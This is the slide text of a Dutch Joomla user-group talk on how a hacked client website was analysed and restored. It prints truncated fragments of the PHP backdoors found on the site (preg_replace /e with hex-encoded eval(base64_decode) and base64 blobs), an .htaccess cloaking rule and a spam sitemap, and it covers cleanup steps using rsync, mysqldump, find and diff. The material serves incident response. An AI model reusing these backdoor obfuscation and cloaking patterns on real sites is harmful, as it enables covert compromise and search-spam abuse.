Bij een routine controle ontdekte Peter dat de website van een klant enkele vreemde nieuwe bestanden bevatte. Na enkele grondige scans ontdekte hij dat de website was "gehacked".
Wat te doen als je website is gehackt? In deze presentatie (gegeven bij Joomla User Group Den Bosch) bespreekt Peter waarom websites worden gehackt, toont hij enkele website hacks, en laat zien hoe je een website kunt herstellen.
19. Ik admin
toegang op
website?
Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Website gehackt 3
Klant
SSH op website
Backup,
(just in case)
?!?! verschil grootte
vorige backup?
Verdachte php
bestanden &
viagra sitemap.xml
20. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Backdoor 1
/includes/xmlrpc.php - 07 september 2014 23:15:01
<?php
# GNU LESSER GENERAL PUBLIC LICENSE
# Version 3, 29 June 2007
#
# Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
# Everyone is permitted to copy and distribute verbatim copies
# of this license document, but changing it is not allowed.
[..]
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
$auth_pass = "52fd812f55cb3118bb3bfe575b59a02d";
$color = "#df5";preg_replace("/.*/e","x65x76x61x6Cx28x67x7Ax69x6Ex66
x6Cx61x74x65x28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'7X1re9s2z/D
n9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT
7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkz
wx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw
1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzrumVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuW
HZrmq5Yysm45z49jTyPXHncgdOQICcumz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/Niet in ruGNr96fS4A607PTg+backup van
gsa
a9cpzk3fVIF18MLGL1OL+dGwjAQzKhlHgTkLPCodOWCzQSCFI4ETTYMzcsMMHT+Zs8sEExBOqWi2OfS3AGiwPL/hofPh+PQMmCJTN2UATKGzc3z87mAvF4ZnEaa4FbPQP/QH7riIhPdcp2hsAJswy3MH45YNzOAE7Y2+18 oktober H4zYyImGfq8
2014 !
Z
18cOo/cEKw5kf9Bpswx1PphGLbidOayJS2dga8a+2mh1OuzA87Nrypk7LbLfN9sYaYoY/UGXb0AlD8p3I9v0rIKp
wBd1zTZNDtOKicPUNGlm4brIMGOJxk+lmTaNhB6mh8YMMN0R+4n12YWIOcDP7+WdWHPWeZ9JbUIuKQiOMF9DmyBs
oDeXKainkKVZckRWLJswvDNX+/TdbCpKtpOhLRlT0A3BB5Hv+DOYpDAF8FT+8+dA5Pi1Xy+slap8xc8dGiRV8XHB
M+DBh3nqhI1PG7g2kFEKr73RGsGBAGk3LAU7LOFVMnZUErsT4TA+ciR9E7nhAs6/Qc0MLlqWOHOtQw5fJRbyFoQ
Gehackt op 19 oktober 2014
21. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Payload 1
.htaccess - 09 november 11:45:48
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing|spaumbot) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^([^/]*)/$ /main.php?p=$1 [L]
##
# @package Joomla
# @copyright Copyright (C) 2005 2014
Open Source Matters. All rights
reserved.
# @license GNU General Public License version 2 or later; see
LICENSE.txt
##
Toegevoegd
Hack via backdoor door 2e hacker
22. Hack via backdoor door 2e hacker,
op 9 november 2014 toegevoegd.
Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Payload 2
main.php - 10 juli 2013 11:25:27
<?php Error_Reporting(0);
$xTBYAB76GYfo="rRgNb9pINsmlkm88FKyALcceuFM36xyYbdASOBpMe4FEhCapvQV74nL1b0
il/v97b8Y2BkKSSudIwZ55X/O+5/38EUW9Pm96w07Tu3B//vAIMYjTZIpBqKY3/Gkw/vlDq3N
/6bS85h9e811y5rqnThu+nMFHr+cmJ5PreNTqeW4c8L/9/PHzB4dnqZK3FZXyK/7vDcyzfgtw
xptgKiXUqBplRvx0ETk/4nu9qkoAhzClalrMj8vlchjP43j+NGzNvvPTL7GDm0rNso2aqemwn
6jMKhG2sEzdtDVTXygVk9RMaz+0jFoiaCnEsJiqGgTBbV21DJ0yna4AVEbeMuLYhgSpUKpcRl
ESrjDDJFKpSWhJiQCLGbqj1nRyf38fKhVFEimRqqOzMhBYoUn2Jq2kOy9TkaIUpFCNqkmO2H6
oMxrpBrXVqMHosamyLWRpXU1VGfWXVFECYcQlrSkoAgoGi2NcUZR9hspNXER8w1lVZQjLkUC9
pFtUA+HYnqZS1U/UfdUBng5lNcWxNZJsEd6E8NFUvEC3AOvDvm7WmO84o07Xc5xAAoMc6HEoA
VCh+[..]
+jPuv0ZCSPco4yHZS4goVte05ZaSQG+kdELd9Sz2YzKa3nwIRHiW9qulHKSSXNiggPBGFb0SQ
PUZPP4iNUBuLj2JSJG6RItv9Dw==";preg_replace("/.*/e","x65x76x61x6Cx28
x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'ZXZhbChiYXNlNjRfZ
GVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLU0doeVRXeEdkbHByYkRSVV[..]
preg_replace("/.*/e","eval(base64_decode('
23. Hack via backdoor door 2e hacker,
op 9 november 2014 toegevoegd.
Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Payload 3
sitemap.xml - 9 november 2014 11:50:42
<?xml version="1.0" encoding="UTF8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
<url>
<loc>http://www.voorbeeld.nl/viagraprofessional100mg/</
loc>
<lastmod>20141109</
lastmod>
<changefreq>monthly</changefreq>
<priority>1.0</priority>
</url>
<url>
<loc>http://www.voorbeeld.nl/longtermsideeffectsofcialis/</
loc>
<lastmod>20141109</
lastmod>
<changefreq>monthly</changefreq>
<priority>1.0</priority>
</url>
<url>
<loc>http://www.voorbeeld.nl/priceofviagra100mgtablet/</
loc>
<lastmod>20141109</
lastmod>
<changefreq>monthly</changefreq>
<priority>1.0</priority>
</url>
</urlset>
590 spam links
24. via backdoor door 2e hacker,
op 9 november 2014 toegevoegd.
Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Backdoor 2
/libraries/joomla/session/cache.php
19 augustus 2013 14:45:46
Aangepast!
<?php Error_Reporting(0);
$x0bp6Rx0vRH="vRhrb9s28K+71VLHDtCsfmRTggC2GUOijFo1LWlA3CY/oAX6F0ZDZWWl
k5ols9MmLnZHUrLkR5btw5w4Eo/34r2Z9x8Mz6Oe2SIB9Zhrd5N5unz/4f2HqU+8N8Qzx/
A0rS6xmbgXL6Zm22j9bLRO+ctG48hswsqsPjP2G/xEUrkdkXwOPNI1BxbrDxM+84nTOaNs
5vJYbPJMU/FOSutS2nUIiKhU620j51Vi9UziALPzrm9d9T1r5BDvvNrzf6LsSm2eH5Ceaw
WWx2zi+ec5xdUBPXNhe8hYcI4c/MDtAbFm8qh2K92YNyag2kRqHIxZx5XgRqupNJ52CXNc
+7UPQE5tDsDpgPZwNecSQ8Bn2nO9e+a5g8RnnumRwLH6JOGj0SjiMefxmo1f1tpg3WgFbR
m/NI12w2y2DvlJit7KuQ56Nwm+IPAj/E4Diw2VrF30GbnElPT4phnIHd97M/S3eV9ptlxH
g1Mx6tAR8RINlNzwveP4CiE/dojHDuMwjLfjSo3UKgqvnFArhrHh+j5hyZQFgfYTGwSoO1
AhEI0Pj0sivdFA+08EcXyCuAIZdMZ2n7nUNsmF6zM/4f6lb4ILTUYGgQlm5BuM1zESab8C
3wJuAvu2NSCJaVYO64ZpKl9NdAC5neSz60smGVEUzsIoP+0sBPHIdPAakMROrHh+fX2dZn
u0mucJwFJtpXWW1AkIoFOCpcYzyW8OKhuUr9if4Dv38D";preg_replace("/.*/e","x
65x76x61x6Cx28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65
x28'ZXZhbChiYXN
preg_replace("/.*/e","eval(base64_decode('
25. via backdoor door 2e hacker,
op 9 november 2014 toegevoegd.
Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Backdoor 3
/administrator/fs-login.phtml -
09 november 2014 11:45:48
<?php Error_Reporting(0);
$xJdU8NfauOq="5b1rdxrH0igs2Y4kHxzLkmXLlix7EGQmWsuKGcjAwDDR79gfvJftABLYRuzMaIIQxH/
9VFXf54KQk/0871kve8eC7urq6lt1dVV19cQrW91S1XOceBgnn+rNVvNL89PXL+f93z987Xsf67Xfvw4+
1Qet8+bvNTe5/Ne/J63AD2yE/rNW/0gpNbfulX2r5LWsMOhAVlR3er3fIz2v7Lgl7zfvLeRadtnVs1pdz
3ZcC8vdDzu1oOJc9wcf+1j8X/8O6/Mrt121TueT0ubOxr2dje3o1drag9I6/Co9e7pzsBY9XCzid//6dw
yfCdRjP2u4HQsb5Nm2dzpPngZBw3eTaZxs+mW7il9ebh48Dyz8Fnolz251w2PXxp8/ep2a+xa/bXjtpg+
Ji0uGGiip2m6j1PasVnce3UTxLA7bVT+oufPo52iq172AvOgmxMRVqMZP1/Vqrj0nsJv+rBd/6H2IDwIr
3g3KnVokqMCP+za0+M+Tf/37BLtpL+yEJejEeeTadmCX/KARTQ/WX7zAcioTkksE4ETTnpnV9t6W3Lduq
4xjWLLCtitAIJt+l/ywHVpzldj2GmGr9FM5sFynZJc7CMSzYWzDDvTL/c3DErR+8+jwADojGsw+UktoXB
tpFI1qa8465X293GGTCRA4lh1WHd9zuq4zn9CYMqD3tmuV7U4cOiU20iLzMxt5wF4lEnQMOCYcbBznoQb
y3kOfvp+UHhxursEsypBAGWJAJqX9w8M3Rzu5gCwLQWmUZKsqTvAiaISdOWtILXTnyQXMrtjzw0Zn2II5
5Nqji3pgt+O2a3WD2rAaONboASzUSmDXxvFF2KmWrdg6rbrDKk+NO16b/Rrp2U65CeMWH3t+2R1Go1E0u
rhBzPAHqhwlWfKwIa7VCoIzIGxyBj12rFYYb9T25OwhtHlyzPshU0Bg1VawZDZq6kNu6OAEZL26HWE2rI
34jz/iebv2MZM+hDo1PGpVGESzksbSewVoAMFUL05TkZERz68EIbyBxTiAjJ9/jleCjK+K6FVzQOspmD8
W8NcKcAIYNvg1f/DqQelwc9qbni+o8Ukl7CQLnJ8BsrgIfiKndH3HVYmd8C1jnxPHq7ulNvAoSKb [..]
N1BmC06baOOvUABzLnQQOPayaWUZNuVsvz/RKeu0tYqggU6iMX1/8L";preg_replace("/.*/e","x6
5x76x61x6Cx28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'ZXZhbCh
iYXNlNj
preg_replace("/.*/e","eval(base64_decode('
26. via backdoor door 2e hacker,
op 9 november 2014 toegevoegd.
Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Backdoor 4-9
Toegevoegd op 09 november 2014 11:45:48
/language/comnon.phtml
/layouts/fedit.php
/libraries/fedit.php
/logs/comnon.php
/plugins/fs-login.phtml
/tmp/Iicense.php
bevat:
<?php Error_Reporting(0);
preg_replace("/.*/e","x65x76x61x6Cx28x62x6
1x73x65x36x34x5Fx64x65x63x6Fx64x65x28
29. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Terminal
Text Terminal
“TTY” TeleTYpewriter
30. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Terminal
Windows
– SSH programma: PuTTY
Mac OSX
– Ingebouwd: “Terminal”
Linux
– Ingebouwde Terminal Emulator
31. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
SSH
Secure SHell
gebruikt public-key cryptografie
(authenticatie & veilige data communicatie)
peter@computer:~$ ssh peter@192.168.0.10
32. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
SSH
peter@computer:~$ ssh peter@example.com
The authenticity of host 'example.com (93.184.216.119)' can't
be established.
RSA key fingerprint is 10:51:ab:f5:d7:[..]:17:16:1f:22:33.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'example.com,93.184.216.119'
(RSA) to the list of known hosts.
peter@example.com's password:
peter@example.com ~ $
35. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Backup files
Backup van voor de hack?
– Hosting partij?
– Akeeba backup (offline)?
Maak backup van huidige situatie
(inclusief hack!)
– Akeeba backup
– Rsync / MySQL dump
36. gebruikersnaam
@ server : folder
gebruikersnaam
@ server : folder
Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
rsync
Remote synchronization
– rsync van “bron” naar “doel”
$ rsync -arv peter@voorbeeld.nl:~/joomla-cms/
/var/www/joomla-cms-backup/
37. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
MySQL Dump
MySQL Dump
$ mysqldump -u gebruikersnaam -p
databasenaam > bestand-met-sql-uitvoer.txt
39. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Analyse
● Software versies:
– CMS (Joomla versie?)
– Versies 3rd party extensies?
● Access Logfiles
– Vreemde POST requests?
40. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Analyse
● Nieuwe bestanden op server
– .php files in /images/ map?
● Bestanden met vreemde code
– Base64 decode
● Vergelijk bestanden met originele bestanden
– diff
41. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Nieuwe bestanden
Aangemaakt in de laatste 7 dagen:
find . -type f -ctime -7
42. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Recent gewijzigd
Gewijzigd tussen 7 en 3 dagen geleden:
find . -type f -mtime -7 ! -mtime -3
47. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
diff
Vergelijk bestanden van website met originele
bestanden:
– Zorg voor map met originele Joomla + extensies
● Oude backup of
● Nieuwe installatie Joomla + extensies
– Zorg voor map met gehackte website
Gebruik diff software om te vergelijken:
– Linux + OSX: Meld
– Windows: WinMerge
54. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Vragen?
Peter Martin
e-mail: info at db8.nl
website: www.db8.nl
twitter: @pe7er
Presentatie: http://www.db8.nl
55. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Used Photos
Titel sheet:
Guy Fawkes Mask - Ben Fredericson, 2009
http://commons.wikimedia.org/wiki/File:Guy_Fawkes_Mask.jpg
1. Waarom hacken?
Question mark (3534516458) - Marco Bellucci, 2005
http://commons.wikimedia.org/wiki/File:Question_mark_(3534516458).jpg
Credit-cards - Lotus Head, 2005
http://commons.wikimedia.org/wiki/File:Credit-cards.jpg
Pickpocket girl - Lunch Photography, 2008
http://commons.wikimedia.org/wiki/File:Pickpocket_girl.jpg
Graffiti-Sokolov5 - Orange.man, 2008
http://commons.wikimedia.org/wiki/File:Graffiti-Sokolov5.JPG
Phishing - Stomchak, 2010
http://commons.wikimedia.org/wiki/File:Phishing.JPG
Spam 2 - Bodo Akdeniz, 2005
http://commons.wikimedia.org/wiki/File:Spam_2.jpg
Plugboard wires - Daniel Sancho, 2005
http://commons.wikimedia.org/wiki/File:Plugboard_wires.ds.jpg
56. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Used Photos
WAC telephone operators operate the Victory switchboard during the Potsdam Conference in their
headquarters in - U.S. National Archives and Records Administration, 1945
http://commons.wikimedia.org/wiki/File:WAC_telephone_operators_operate_the_Victory_switchboard
_during_the_Potsdam_Conference_in_their_headquarters_in..._-_NARA_-_199007.jpg
Butterfly Labs Bitcoin miner - arstechnica.com, 2013
http://cdn.arstechnica.net/wp-content/uploads/2013/05/IMG_6048-Version-3.jpg
Cirencester, market place - Tony Grist, 2008
http://commons.wikimedia.org/wiki/File:Cirencester,_market_place.jpg
2. Hacked
Youve-been-hacked, Hanonen, 2014
http://commons.wikimedia.org/wiki/File:Youve-been-hacked.jpg
Piedbiche - Isabelle Grosjean, 2001
http://commons.wikimedia.org/wiki/File:Piedbiche.jpg
3. SSH connectie
Switchboard Manual - Peel Conner, Geez-oz, 2012
http://commons.wikimedia.org/wiki/File:Switchboard_Manual_-_Peel_Conner.JPG
Bundesarchiv Bild 183-2008-0516-500, Fernschreibmaschine mit Telefonanschluss - Illger, Willi, 1930
http://commons.wikimedia.org/wiki/File:Bundesarchiv_Bild_183-2008-0516-500,_Fernschreibmaschin
e_mit_Telefonanschluss.jpg
57. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Used Photos
4. Procedure
Motorola M6800 manuals - Michael Holley, 2010
http://commons.wikimedia.org/wiki/File:Motorola_M6800_manuals.jpg
Backup
IBM 7330 on white background, Crisco 1492, 2013
http://commons.wikimedia.org/wiki/File:IBM_7330_on_white_background.jpg
Analyse
Postcards and magnifying glass, Anna, 2007
http://commons.wikimedia.org/wiki/File:Postcards_and_magnifying_glass.jpg
Magnifying glass on antique table - Stéphane Magnenat, 2008
http://commons.wikimedia.org/wiki/File:Magnifying_glass_on_antique_table.jpg
Magnifying glass - Faberge - shakko, 2011
http://commons.wikimedia.org/wiki/File:Magnifying_glass_-_Faberge.jpg
Binary Code, Cncplayer, 2013
http://commons.wikimedia.org/wiki/File:Binary_Code.jpg
Two different shoes on, Kelly Bailey, 2007
http://commons.wikimedia.org/wiki/File:Two_different_shoes_on.jpg
Herstel
IBM 650 at Texas A&M open for repair - Cushing Memorial Library and Archives, Texas A&M, 2009
http://commons.wikimedia.org/wiki/File:IBM_650_at_Texas_A%26M_open_for_repair.jpg
Conclusie
EquinoxeJuniorHighPac-Man - Equinoxe, 2012
http://www.c64-wiki.com/index.php/File:EquinoxeJuniorHighPac-Man.png